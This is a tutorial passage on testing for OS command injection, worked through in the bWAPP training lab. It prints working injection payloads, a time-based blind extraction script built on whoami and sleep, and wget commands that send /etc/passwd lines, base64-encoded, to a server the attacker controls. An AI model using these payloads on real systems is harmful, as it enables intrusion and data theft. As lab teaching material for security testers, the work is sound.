7.1. Searching and Testing for Command Injection Vulnerability

 

Testing Procedure

Searching for and testing vulnerabilities involves several stages:

  • Conduct a site review and identify entry points, i.e., places used to transmit data to the server. These include:
    • Parameters in the URL
    • Paths in the URL
    • HTTP headers
    • Various forms on the page (file upload, drop-down lists, etc.)
  • Use proxy intercepting programs to inject simple commands and monitor the server's response.
  • Conduct fuzzing and choose an appropriate command or set of commands based on the program's results.
  • If the command's result is not displayed on the page, it may not have worked or there may be a so-called blind injection, i.e., Blind Command Injection. In this case, vulnerability exploitation (hacking) is possible using one of the methods listed below:
    • Delayed execution call. The application will "hang" for a certain period waiting for a server response.
    • Redirecting the command output to another file on the server. The contents of this file can be read through image previews or other files displayed on the page.
    • Data exfiltration through DNS/HTTP requests. Calling network commands to connect to a server controlled by an attacker.

For quick searching, I recommend starting by examining URLs with parameters. The following parameter names, which may be vulnerable to Command Injection, are most encountered:

  • query
  • jump
  • do
  • func
  • option
  • load
  • process
  • read
  • req
  • feature
  • module
  • payload
  • run
  • print
  • file
  • filename

 

Command Injection – Practice

Let's go through a simple example in the bWAPP application. Choose the OS Command Injection option or simply enter the URL http://machine_IP/bWAPP/commandi.php. Here, you are presented with the task of determining the IP address from its domain name:

bWAPP Command Injection test

By the way, there are quite a few websites that offer similar functionality. Now let's try entering any command, for example, ;pwd:

Testing command injection in bwapp

The request itself is sent using the POST method:

View of Request in BurpSuite

You can enter a more complex command, for example, cat /etc/passwd, and the result will be displayed on the page.

 

Blind Command Injection – Practice

Let's look at another example. This time, we'll test blind injection, where the result is not displayed on the page. Below, we'll discuss the hacking techniques used when this vulnerability exists.

 

Redirecting Command Output to a File

Once again, let's use bWAPP and select the test named "OS Command Injection – Blind." Here, the application suggests running a Ping command, but the utility's results are not displayed on the page.

To begin, let's execute a simple command, but we'll redirect the command's output to a new text file, which we will then open via a direct link. First, we need to determine if any files are displayed on the page, such as images. And indeed, there are such files:

Image path in app for OS Command Injection

We'll remember the directory name and execute the following command:

10.0.2.5;pwd>./images/injection.txt

The > symbol is used to redirect the output of the command to the specified file. Now, let's open the link to view the file:

Redirection output to file in blind os injection

As you can see, this method works perfectly.

 

Calling Delays

To confirm the vulnerability, you can also artificially introduce a delay in command execution. Below are some examples of commands:

On Windows:

# Delay the execution of the command for 500 millisecondsping -n 1 -w 500 localhost
# Delay the execution of the command for 3 secondstimeout /t 3

On Linux:

# Delay the execution of the command for 5 secondsping -c 5 127.0.0.1
# Sleep for 5 secondssleep 5

Let's apply this method to test Blind Command Injection. Open bWAPP again and enter the command:

10.0.2.5;sleep 5

The browser will display the result after approximately 5 seconds.

However, how can we exploit the system using delay invocation commands?

To do this, we need to create a small script that will check the command output character by character and generate a delay if a similarity is detected. The script will look like this:

if [ $(whoami|cut -c 1) = a ]; then sleep 5; fi

The working principle is very simple. The expression inside $() is executed first, which means the whoami command passes its output to the cut utility, which, in turn, extracts the first character. Then, a comparison is made. If the condition is true, the sleep command is executed. We will need to run a series of requests, meaning with each new series, we will change the character position in the condition:

if [ $(whoami|cut -c 1) = a ]; then sleep 5; fi # Determining the first characterif [ $(whoami|cut -c 2) = a ]; then sleep 5; fi # Determining the second characterif [ $(whoami|cut -c 2) = a ]; then sleep 5; fi # Determining the third character

To do this, intercept the corresponding request using Burp Suite or ZAP and inject our exploit:

Injecting apyload to exploit Blind OS Command Injection

As a Payload, we will create a simple text file with Latin letters, numbers, hyphens, and underscores. Upload the created file in the Payloads tab:

Loading payload in BurpSuite

We launch the attack and observe it in a new window. If a character match occurs, the delay is immediately visible. However, I recommend enabling additional columns:

Changing columns in attack window of Burp Suite to detect delays

Blind os injection attack results

After the first character is found, we initiate the next series of requests.

 

Exfiltration via Out of Band Requests

If the vulnerable server has internet access, meaning outgoing requests are allowed, data exfiltration can be done through various network services. As an example, let's try sending an HTTP request to a controlled server. To begin with, let's start a web server on Kali:

python3 -m http.server 80

Now, enter the following command:

10.0.2.5;wget http://10.0.2.5?data=$(whoami)

Check the logs on the web server:

blind os injection exfiltration in http

As you can see, everything is working.

However, what should you do when the command output contains many lines?

Let's try running the command cat /etc/passwd and see what we get:

blind os injection exfiltration in http

The output data is heavily truncated, so let's apply a different technique. The cat /etc/passwd command outputs data in multiple lines, just as it is stored in the file. To display each line separately, you can use the following command:

cat /etc/passwd | sed -n '1p' # Outputs the first linecat /etc/passwd | sed -n '3p' # Outputs the third line

output of etc passwd file line by line

However, in this form, we cannot send the data over HTTP, so we will encode the obtained string using the Base64 algorithm:

cat /etc/passwd | sed -n '3p' | base64

base64 encoded output

Now we can send the data over HTTP. The final command will look like this:

10.0.2.5;wget http://10.0.2.5/$(cat /etc/passwd | sed -n '3p' | base64)

Exfiltrated base64 encoded data in blind os injection

You can decode the received data in Burp Suite:

decoded exfiltrated data

If desired, you can create a small script that will iterate through the entire file and output its content in several iterations.